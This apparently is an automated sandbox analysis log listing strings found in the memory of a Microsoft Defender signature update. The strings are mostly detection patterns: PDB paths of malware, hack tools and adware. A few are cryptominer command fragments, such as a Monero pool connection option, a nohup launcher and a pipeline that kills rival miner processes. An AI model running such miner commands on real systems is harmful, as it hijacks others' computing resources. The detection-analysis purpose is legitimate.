Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: nohup/tmp/bashg-c/tmp/pools.txt>/dev/null2>&1&
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: href="https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff'
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: cryptonight
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: xmrminer
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: URL of mining server
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: XMR-Stak-CPU mining software, CPU Version.
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: \nscpucnminer\img001.exe
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"xmr.crypto-pool.fr:8080
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: CNMiner
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: -o pool.minexmr.com:4444 -u
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: XMRig 2.15.1-beta

Compliance:

barindex
Uses 32bit PE files
Source: 1gPmnCR2PX.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: \Release\runner.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp
Source: Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\binplace.exe source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \src\x64\Release\wajam_64.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: dciman32.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: msmdsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp
Source: Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp
Source: Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: fastfat.pdbN source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: sctasks.pdbd source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: usp10.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: g711codc.pdb3 source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: reg.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: acpidisk.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: mgr.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp
Source: Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.b*m.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb*.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: \Dolphin.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: comp.pdbd source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: acpi.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: .+:\\src\\tcrypt\\Release\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\backdoor.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: MpSigStub.exe, 0000000B.00000003.18268971568.0000021B5F3F4000.00000004.00000001.sdmp
Source: Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: 6\Desktop\EK\Source\Rina_AC\Rina_AC\Release\Rina_AC.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: MpCopyAccelerator.pdb source: mpam-728dfe11.exe, 00000011.00000003.18594278193.0000027770036000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp
Source: Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp
Source: Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp
Source: Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: Release\ProduKey.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: winlogon.PDB source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-com-l1-1-0.pdb^ source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: 0.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp
Source: Binary string: \AppMaster.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbx source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: )\CVE-2019-0803201992\Release\poc_test.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp
Source: Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdba~ source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: wajam_goblin.pdb source: MpSigStub.exe, 0000000B.00000003.18313410353.0000021B5F14C000.00000004.00000001.sdmp
Source: Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp
Source: Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: joy.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp
Source: Binary string: mfcsubs.pdb source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp
Source: Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: netsh.pdbj source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: mshta.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: BTR.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: PROZIPPER.pdb source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: ddraw.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: GPDFDocument.pdb source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp
Source: Binary string: wbadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp
Source: Binary string: Unite.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp
Source: Binary string: \src\Release\wajam.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: Flipopia.pdb source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp
Source: Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: nethtsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp
Source: Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: S*\\server\\V.*\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \PCHunter64.pdb source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: MpDetours.pdb source: mpam-728dfe11.exe, 00000011.00000003.18581318930.0000027770032000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp
Source: Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \Release\corsar.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp
Source: Binary string: mpg2splt.pdb source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp
Source: Binary string: dxtrans.pdb source: MpSigStub.exe, 0000000B.00000003.18261678877.0000021B5F587000.00000004.00000001.sdmp
Source: Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp
Source: Binary string: fc.pdb0 source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp
Source: Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: EFRE65.pdb source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: boteg.pdbxL source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: SAVService.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: wevtutil.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: wscript.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.*\\.*\\EncryptFile.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: megasync.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
